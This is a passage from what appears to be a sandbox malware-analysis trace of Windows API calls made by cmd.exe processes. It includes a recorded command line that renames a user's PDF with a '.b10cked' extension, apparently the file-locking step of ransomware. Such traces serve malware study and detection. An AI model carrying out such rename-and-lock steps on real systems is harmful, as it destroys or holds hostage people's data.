lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.064] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.064] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, 
lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.065] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.065] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] GetFileType (hFile=0x4c) returned 0x1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] GetFileType (hFile=0x4c) returned 0x1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.764] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.764] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.766] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.766] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: 
lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.767] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.767] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x32, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x32, lpOverlapped=0x0) returned 1 [0140.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.768] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.768] _close (_FileHandle=4) returned 0 [0140.768] FindNextFileW (in: hFindFile=0x350ee0, lpFindFileData=0x2af454 | out: lpFindFileData=0x2af454) returned 0 [0140.768] GetLastError () returned 0x12 [0140.768] FindClose (in: hFindFile=0x350ee0 | out: hFindFile=0x350ee0) returned 1 [0140.769] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.769] _close (_FileHandle=3) returned 0 [0140.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.769] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.770] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.770] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.770] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.770] SetConsoleInputExeNameW () returned 0x1 [0140.770] GetConsoleOutputCP () returned 0x1b5 [0140.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.770] exit (_Code=0) Process: id = "171" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x638" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14976 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14977 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14978 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14979 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14980 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14981 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14982 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14983 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 
14984 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14985 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15501 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15502 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 15503 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15504 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 15507 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15512 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 15513 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15514 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15515 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15516 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 15517 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15518 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15519 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 15520 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 15521 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 228 os_tid = 0xf70 [0140.085] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcec | out: lpSystemTimeAsFileTime=0x1cfcec*(dwLowDateTime=0x8d6ef1c0, dwHighDateTime=0x1d440a9)) [0140.085] GetCurrentProcessId () returned 0x638 [0140.085] GetCurrentThreadId () returned 0xf70 [0140.085] GetTickCount () returned 0x2c023 [0140.085] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfce4 | out: lpPerformanceCount=0x1cfce4*=19687452346) returned 1 [0140.086] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.086] __set_app_type (_Type=0x1) [0140.086] __p__fmode () returned 0x76b331f4 [0140.086] __p__commode () returned 0x76b331fc [0140.086] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.086] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.086] GetCurrentThreadId () returned 0xf70 [0140.086] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf70) returned 0x38 [0140.086] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.086] 
GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.086] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.087] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc7c | out: phkResult=0x1cfc7c*=0x0) returned 0x2 [0140.087] VirtualQuery (in: lpAddress=0x1cfcb3, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 